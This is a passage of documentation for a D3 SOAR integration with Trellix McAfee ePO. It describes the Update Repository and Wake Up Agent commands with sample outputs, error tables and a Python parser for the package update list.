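        for e in entries
    )


if __name__ == "__main__":
    report = parse_update_output(SAMPLE_OUTPUT)
    for entry in report["entries"]:
        print(entry["action"], entry["product"], entry["version"])
    print("DAT newer than 9534.0000:",
          advanced_past(report["entries"], "VSCANDAT1000", "9534.0000"))
```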
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
successskipped: current\LMASECORE2000\2.2.0.9309\SpamEngine\0000
	skipped: current\BOCVSE__1000\657\DAT\0000
	skipped: current\AMCORDAT1000\1359.1\DAT\0000
	updated: current\TELECONT1000_EPO\1.20\Update\0000
	updated: current\TELECONT1000\5.18\Content\0000
	skipped: current\VIRUSCAN8700\8.7.0\LangPack\0000
	updated: current\MAR_CONTENT_1000\1.1.0\Update\0409
	skipped: current\VIRUSCAN8800\8.8.0\LangPack\0000
	skipped: current\SUPPMVTCT1000\8.3.0.357\MVTContentUpdate\0000
	skipped: current\PHCONTENMETA\6006\PHContent\0000
	updated: current\VSCANENG1000\6000.8403\Engine\0000
	updated: current\LV2SNENG1000\6000.8403\Engine\0000
	updated: current\MSCANENG1000\6000.8403\Engine\0000
	skipped: current\DBSECDAMMETA\94.3101\DAT\0000
	updated: current\SUPPCLNT1000\4.1.0.0\ServicePack\0409
	skipped: current\MASECORE2000\2.2.0.9309\SpamEngine\0000
	updated: current\MVEDR_R_3000\3.0.0\DAT\0000
	updated: current\EPOAGENT5000META\5.6.3\Update\0000
	updated: current\MARRULES1000\2.4.2\DAT\0000
	skipped: current\DBSECDVMMETA\175.1967\DVMCHECKS\0000
	skipped: current\Findings\1268\FNDContent\0000
	skipped: current\AUENGINEMETA\1293\BMContent\0000
	updated: current\JTICLIENTMETA\1.0.0\Content\0000
	updated: current\ENDPCNT_1000\10.6.0\DAT\0000
	skipped: current\ENCPTCNT6000\8.0.0.9963\DAT\0000
	updated: current\AMCORDAT2000\4008.0\DAT\0000
	updated: current\VSCANDAT1000\9557.0000\DAT\0000

Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful

Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

CODE
success skipped: current\LMASECORE2000\2.2.0.9309\SpamEngine\0000 skipped: current\BOCVSE__1000\657\DAT\0000 skipped: current\AMCORDAT1000\1359.1\DAT\0000 updated: current\TELECONT1000_EPO\1.20\Update\0000 updated: current\TELECONT1000\5.18\Content\0000 skipped: current\VIRUSCAN8700\8.7.0\LangPack\0000 updated: current\MAR_CONTENT_1000\1.1.0\Update\0409 skipped: current\VIRUSCAN8800\8.8.0\LangPack\0000 skipped: current\SUPPMVTCT1000\8.3.0.357\MVTContentUpdate\0000 skipped: current\PHCONTENMETA\6006\PHContent\0000 updated: current\VSCANENG1000\6000.8403\Engine\0000 updated: current\LV2SNENG1000\6000.8403\Engine\0000 updated: current\MSCANENG1000\6000.8403\Engine\0000 skipped: current\DBSECDAMMETA\94.3101\DAT\0000 updated: current\SUPPCLNT1000\4.1.0.0\ServicePack\0409 skipped: current\MASECORE2000\2.2.0.9309\SpamEngine\0000 updated: current\MVEDR_R_3000\3.0.0\DAT\0000 updated: current\EPOAGENT5000META\5.6.3\Update\0000 updated: current\MARRULES1000\2.4.2\DAT\0000 skipped: current\DBSECDVMMETA\175.1967\DVMCHECKS\0000 skipped: current\Findings\1268\FNDContent\0000 skipped: current\AUENGINEMETA\1293\BMContent\0000 updated: current\JTICLIENTMETA\1.0.0\Content\0000 updated: current\ENDPCNT_1000\10.6.0\DAT\0000 skipped: current\ENCPTCNT6000\8.0.0.9963\DAT\0000 updated: current\AMCORDAT2000\4008.0\DAT\0000 updated: current\VSCANDAT1000\9557.0000\DAT\0000

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Update Repository failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

Update Repository failed.

Status Code: 401.

Message: Unauthorized.
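
The Raw Data above is plain text rather than JSON, so a playbook step that needs to branch on individual packages has to parse it first. The following is an added example, not part of the D3 or Trellix documentation: it splits the output into one record per package and lists watched package types that were not updated. The segment names in `FIELDS`, the `watch_types` default and the function names are assumptions, and the sample input is constructed from lines shown above.

```python
import re
from collections import Counter

# Constructed sample in the shape of the Raw Data above: a status line,
# then one "<action>: <path>" entry per repository package.
SAMPLE_RAW = (
    "success\n"
    "\tskipped: current\\AMCORDAT1000\\1359.1\\DAT\\0000\n"
    "\tupdated: current\\VSCANENG1000\\6000.8403\\Engine\\0000\n"
    "\tupdated: current\\VSCANDAT1000\\9557.0000\\DAT\\0000\n"
    "\tskipped: current\\VIRUSCAN8800\\8.8.0\\LangPack\\0000\n"
)

ENTRY = re.compile(r"^(?P<action>[a-z]+):\s*(?P<path>\S+)$")
# Assumed names for the five path segments; the page does not label them.
FIELDS = ("branch", "product", "version", "package_type", "language")


def parse_update_output(raw):
    """Split Raw Data into (status, entries, unparsed_lines)."""
    status, entries, unparsed = "", [], []
    lines = [ln.strip() for ln in raw.splitlines() if ln.strip()]
    for index, line in enumerate(lines):
        match = ENTRY.match(line)
        parts = match["path"].split("\\") if match else []
        if match and len(parts) == len(FIELDS):
            entries.append({"action": match["action"], **dict(zip(FIELDS, parts))})
        elif index == 0 and match is None:
            status = line          # leading status line, e.g. "success"
        else:
            unparsed.append(line)  # keep odd lines visible instead of dropping them
    return status, entries, unparsed


def summarize(raw, watch_types=("DAT", "Engine")):
    """Counts per action plus the watched package types that were not updated."""
    status, entries, unparsed = parse_update_output(raw)
    return {
        "status": status,
        "counts": dict(Counter(e["action"] for e in entries)),
        "not_updated": sorted(e["product"] for e in entries
                              if e["package_type"] in watch_types
                              and e["action"] != "updated"),
        "unparsed": unparsed,
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_RAW))
```

The page does not define what `skipped` means for a package, so the `not_updated` list is a prompt for review rather than a failure signal.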

Wake Up Agent

Wakes up the agent associated with the provided IP addresses or hostnames.

Input

| Input Parameter | Required/Optional | Description | Example |
|---|---|---|---|
| IP or Hostnames | Required | The hostnames or IPv4 addresses to wake up associated agents. | ["1.1.1.1"] |
| Wake Up Agent? | Required | The option to wake up the associated agents. | True |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
completed: 1
failed: 0
expired: 0

Context Data

The data extracted from Raw Data, converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
completed: 1
failed: 0
expired: 0

Return Data

Indicates one of the possible command execution states: Successful, Partially Successful, or Failed.

The Partially Successful state only occurs when a command’s input accepts an array of items (e.g. an array of IP addresses) and one or more items within the array return an error from the API request.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful

Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

CODE
completed: 1 failed: 0 expired: 0

Error Handling

If the Return Data is Partially Successful or Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Wake Up Agent failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 404. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: No systems found to wake up. Enter valid computer IDs/names. |

Error Sample Data

Wake Up Agent failed.

Status Code: 404.

Message: No systems found to wake up. Enter valid computer IDs/names.
